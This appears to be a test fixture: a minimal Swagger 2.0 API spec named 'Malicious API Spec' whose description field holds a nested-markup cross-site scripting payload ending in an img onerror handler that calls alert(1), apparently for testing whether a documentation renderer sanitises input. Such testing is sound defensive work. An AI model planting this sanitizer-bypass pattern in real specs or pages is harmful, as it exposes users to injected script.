# malicious.yaml
swagger: '2.0'
info:
  title: Malicious API Spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(1)'>">
  version: 1.0.0
paths:
  /test:
    get:
      responses:
        '200':
          description: Success
